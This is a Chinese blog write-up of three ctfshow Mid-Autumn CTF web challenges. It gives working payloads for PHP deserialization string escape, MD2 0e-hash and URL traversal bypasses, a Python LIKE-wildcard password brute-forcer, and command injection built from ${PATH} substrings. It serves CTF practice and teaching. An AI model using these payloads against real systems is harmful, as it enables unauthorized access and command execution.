ctfshow月饼杯 web_wp

最新推荐文章于 2023-06-28 09:54:12 发布
最新推荐文章于 2023-06-28 09:54:12 发布
阅读量392 收藏
点赞数
分类专栏: ctf writeup 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45089570/article/details/109625494
版权

web1_此夜圆

<?php
error_reporting(0);

class a
{
	public $uname;
	public $password;
	public function __construct($uname,$password)
	{
		$this->uname=$uname;
		$this->password=$password;
	}
	public function __wakeup()
	{
			if($this->password==='yu22x')
			{
				include('flag.php');
				echo $flag;	
			}
			else
			{
				echo 'wrong password';
			}
		}
	}

function filter($string){
    return str_replace('Firebasky','Firebaskyup',$string);
}

$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?>

这里由于只能get传入一个1参数,最后经反序列化后password==='yu22x'就能拿到flag。
而1参数赋值给的是$uname,这里就涉及到了反序列化逃逸,可以参考羽师傅的文章:[0CTF 2016]piapiapia(反序列化逃逸)

#示例:
$s = 'a:1:{i:0;s:3:"abc";}de";}';
var_dump(unserialize($s));

#得出
array(1) {
  [0]=>
  string(3) "abc"
}

image-20201110223711263

也就是说,反序列化出来就会把后面的忽略掉。
此题默认password=1,反序列化后就会生成s:8:"password";i:1;
而我们可以自己构造s:8:"password";s:5:"yu22x";

尝试一下在本地传入Firebasky";s:8:"password";s:5:"yu22x";}

序列化结果

O:1:"a":2:{s:5:"uname";s:39:"Firebaskyup";s:8:"password";s:5:"yu22x";}";s:8:"password";i:1;}

这里由于我们传入的字符串有39位,把我们需要的password也给覆盖了

在这里插入图片描述

";s:8:"password";s:5:"yu22x";}的长度为30,而每输入一个Firebasky被替换成Firebaskyup,长度保持不变,也就可以逃逸出2个字符。所以这里需要15个Firebasky就能逃逸出30个字符。
所以最终payload

?1=FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}

image-20201110224929837

web2_故人心

<?php
error_reporting(0);
highlight_file(__FILE__);
$a=$_GET['a'];
$b=$_GET['b'];
$c=$_GET['c'];
$url[1]=$_POST['url'];
if(is_numeric($a) and strlen($a)<7 and $a!=0 and $a**2==0){
    $d = ($b==hash("md2", $b)) && ($c==hash("md2",hash("md2", $c)));
    if($d){
             highlight_file('hint.php');
             if(filter_var($url[1],FILTER_VALIDATE_URL)){
                $host=parse_url($url[1]);
                print_r($host); 
                if(preg_match('/ctfshow\.com$/',$host['host'])){
                    print_r(file_get_contents($url[1]));
                }else{
                    echo '差点点就成功了!';
                }
            }else{
                echo 'please give me url!!!';
            }     
    }else{
        echo '想一想md5碰撞原理吧?!';
    }
}else{
    echo '第一个都过不了还想要flag呀?!';
}
第一个都过不了还想要flag呀?!

题目hint

存在一个robots.txt

跟以前的md5类似啊。用0e开头的数,一次加密后也是0e的一个数和两次加密后也是0e的数就可以。
后来还给了hint,访问robots.txt,得到hinthint.txt,内容

Is it particularly difficult to break MD2?!
I'll tell you quietly that I saw the payoad of the author.
But the numbers are not clear.have fun~~~~
xxxxx024452    hash("md2",$b)
xxxxxx48399    hash("md2",hash("md2",$b))

第一关

is_numeric($a) and strlen($a)<7 and $a!=0 and $a**2==0

第一个绕过我们可以构造特别小的数字进行绕过,0.000000000000000000000000000000000000000000000001可以绕过但是这里限制了长度,所以我们就可以通过科学计数法呀
payload:1e-200
这里自己之前测试过window和linux下面的精度都一样是1e-162
但是这个长度要有限制的,即1e-162到1e-323超过323位会失效

第二关

脚本:

<?php
/*	//直接爆破
for ($i=100000000; $i < 10000000000; $i++) {
	$b=hash("md2", '0e'.$i);
	if(is_numeric($b) && substr($b,0,2)==='0e'){
		echo '$i = ';echo $i;
		echo '$b = ';echo $b;
	}

	$c=hash("md2",hash("md2", '0e'.$i));
	if(is_numeric($c) && substr($c,0,2)==='0e'){
		echo '$i = ';echo $i;
		echo '$c = ';echo $c;
	}
}
*/

for ($i=0; $i < 999999; $i++) { 
	$b=hash("md2", '0e'.$i.'024452');
	if(is_numeric($b) && substr($b,0,2)==='0e'){
		echo '$i = ';echo $i;
		echo '$b = ';echo $b;
	}

	$c=hash("md2",hash("md2", '0e'.$i.'48399'));
	if(is_numeric($c) && substr($c,0,2)==='0e'){
		echo '$i = ';echo $i;
		echo '$c = ';echo $c;
	}
}
?>

php遇到不认识的协议就会当目录处理,例如a://aaa/…/…/etc/passwd之类的。

url=a://ctfshow.com/../../../../../../../fl0g.txt

image-20201111151227964

web3_莫负婵娟

右键查看源代码发现

<!-- username yu22x -->
<!-- SELECT * FROM users where username like binary('$username') and password like binary('$password')-->
12

看来是like注入了。
like模糊查询可以使用%匹配多个字符,_匹配单个字符。
尝试后发现%被过滤,不过下划线(_)并没有被过滤。
这里就需要猜测password的位数了,好家伙,竟然密码有32位。如果小于或大于32个_都会报wrong username or password。只有正确匹配才会显示I have filtered all the characters. Why can you come in? get out!
在这里插入图片描述
既然这样,就可以爆破出密码。
脚本

import requests
import string

strs = string.digits+string.ascii_letters
url = 'http://d274b648-0dad-4058-9b20-9a7a35424df5.chall.ctf.show/login.php'

pwd = ''
for i in range(32):
	print('i = '+str(i+1),end='\t')
	for j in strs:
		password = pwd + j + (31-i)*'_'
		data = {'username':'yu22x','password':password}
		r = requests.post(url,data=data)
		if 'wrong' not in r.text:
			pwd += j
			print(pwd)
			break

image-20201111161803740

密码为67815b0c009ee970fe4014abaa3Fa6A0

填入密码来到/P1099.php界面。
在这里插入图片描述
Normal connection表示正常连接
Abnormal connection表示异常连接;
evil input表示被过滤了。

尝试发现过滤了一堆,就连a都过滤了。那就FUZZ跑可显示的字符,看看都过滤了什么
在这里插入图片描述
小写字母全被过滤。大写字母、数字、$:没被过滤。
linux里有一个环境变量$PATH,可以用它来构造小写字母执行命令。
在这里插入图片描述

尝试构造ls得到flag.php。

ip=0;${PATH:5:1}${PATH:2:1}

在这里插入图片描述
构造nl flag.php右键查看源代码得到flag

ip=0;${PATH:14:1}${PATH:5:1} ????.???

在这里插入图片描述

参考文章:

https://blog.csdn.net/hiahiachang/article/details/108800210

西部壮仔
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow月饼 web wp
Firebasky的博客
09-27 1225
这次的这个比赛中的web是我和羽师傅还有m3w师傅一起出的,一人一道。 其中最喜欢的是web3 羽师傅出的,真的太有意思啦。感谢羽师傅呢。 还有web1让自己复习序列化知识,感谢m3w师傅呢 web1_此夜圆 <?php error_reporting(0); class a { public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname;.
ctfshow 2021 月饼 web
Sk1y的博客
09-23 540
文章目录web签到 web签到 <?php //Author:H3h3QAQ include "flag.php"; highlight_file(__FILE__); error_reporting(0); if (isset($_GET["YBB"])) { if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) { echo "小伙子不错嘛!!flag给你了:" . $flag; } else { echo "
内置Web Server
banjuan3729的博客
04-11 126
在终端输入命令:php -S localhost:8000 -t xxx(某个目录或文件) 这个内置的Web服务器主要用于本地开发使用,不可用于线上产品环境。 URI请求会被发送到PHP所在的的工作目录(Working Directory)进行处理,除非你使用了-t参数来自定义不同的目录。 如果请求未指定执行哪个PHP文件,则默认执行目录内的index.php 或者 index.h...
ctfshow web月饼
读书 买花 长大
01-05 302
月饼
ctfshow_月饼
qq_44657899的博客
07-01 455
文章目录0x010x03 web3_莫负婵娟 (LIKE盲注、$PATH环境变量截取字母) 0x01 0x03 web3_莫负婵娟 (LIKE盲注、$PATH环境变量截取字母) 在登录页面的源代码中可以看到一些提示 用户名为yu22x,查询语句为like,可以使用通配符%和_。 百分比(%)通配符允许匹配任何字符串的零个或多个字符。下划线_通配符允许匹配任何单个字符。 fuzz了一下,被过滤的有这些字符,%号被过滤了,我们可以使用_ 写个脚本测试一下密码长度 import requests heade
中秋月饼中秋月饼中秋月饼
01-30
中秋月饼
月饼销售方案月饼销售方案.doc
07-05
月饼销售方案
小游戏-吃月饼源码
03-19
微信小游戏-吃月饼 源码
月饼食品公司网页模板
01-18
月饼食品公司网页模板
中秋节月饼礼盒模板
08-24
中秋节月饼礼盒模板
CTF.show:web1_此夜圆
qq_46230755的博客
02-05 514
先看一下源码 <?php error_reporting(0); class a { public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname; $this->password=$password; } public function __wakeup() { if($this->password==='yu22
CTFSHOW 月饼 web
feng的博客
01-29 512
web1_此夜圆 <?php error_reporting(0); class a { public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname; $this->password=$password; } public function __wakeup()
PHP反序列化之字符逃逸
weixin_72667582的博客
06-28 151
php反序列化之字符逃逸
UNCTF 2020 WP
qq_45796470的博客
03-11 2502
UNCTF 2020 WP WEB easy_ssrf 由题ssrf,且代码过滤了很多重要手段。这里可以直接/?url=unctf.com/…/…/…/…/flag。直接…/穿越读flag。 easyunserialize <?php error_reporting(0); highlight_file(__FILE__); class a { public $uname; public $password; public function __construct($un
月饼II
记录学习,一起进步
05-07 577
月饼2021web方向wp
ctfshow 月饼(第二届) 部分WriteUp
mumuzi的博客
09-21 2686
Misc 杂项签到 右键附件,从链接另存文件。然后用16进制编辑器或者你想用notepad也彳亍看文件尾,有一串base64,解码即可。 ctfshow{we1come_to_mooncake_cap} 有手就行 查看exif,有一串阿拉伯语,翻译过来是“你知道汉明码吗” 查看图片文件尾,发现一串数字 10110110111 然后随便找一篇看一下是怎么编码的,以及如何纠错的 https://blog.csdn.net/qq_19782019/article/details/87452394 例子他举的也
ctfshow-月饼
LYJ20010728的博客
06-15 615
web1_此夜圆web1_此夜圆考点思路Payloadweb2_故人心考点思路Payloadweb3_莫负婵娟考点思路Payload web1_此夜圆 考点 php反序列化字符逃逸 思路 观察 index.php 代码,很容易发现是php反序列化字符逃逸中字符增多的考点,我们要将password的值变为yu22x,从而达到包含 flag.php 的目的,我们需要逃逸的部分为 ";s:8:"password";s:5:"yu22x";},长度为30,所以我们需要15个 Firebasky来达到逃逸这部分
详解Java 序列化与反序列化
weixin_43611145的博客
09-25 172
Java 序列化与反序列化1.基本概念1.1 定义 观前提示: 本文所使用的Eclipse版本为Photon Release (4.8.0),IDEA版本为ultimate 2019.1,JDK版本为1.8.0_141,Tomcat版本为9.0.12。 1.基本概念 1.1 定义 序列化 反序列化 ...
ctfshow_2021月饼记录
MiGooli的博客
09-21 1680
一、WEB篇 作为队内的web手,差点连签到题都做不出来,属实是拉大胯丢大人了 web签到 <?php //Author:H3h3QAQ include "flag.php"; highlight_file(__FILE__); error_reporting(0); if (isset($_GET["YBB"])) { if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) { echo "小伙子不错嘛!!flag给你了:" . $fla
月饼词云python
最新发布
09-16
月饼词云的制作涉及到Python中的数据分析和可视化技术。您可以使用Python的数据分析库(如pandas)和可视化库(如matplotlib或WordCloud)来处理和展示月饼的数据。您可以按照以下步骤进行操作: 1. 导入所需的库,如pandas、matplotlib和WordCloud。 2. 读取包含月饼数据的文件,并将其加载到一个pandas的DataFrame中。 3. 对数据进行必要的清洗和处理,例如去除重复项、空值或异常值。 4. 提取月饼的关键词信息,可以使用分词工具(如jieba)进行中文分词。 5. 统计每个关键词的出现频率,并将其转换为词云所需的格式。 6. 使用WordCloud库生成词云图,并设置合适的参数(如词云的大小、颜色、形状等)。 7. 展示生成的词云图。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值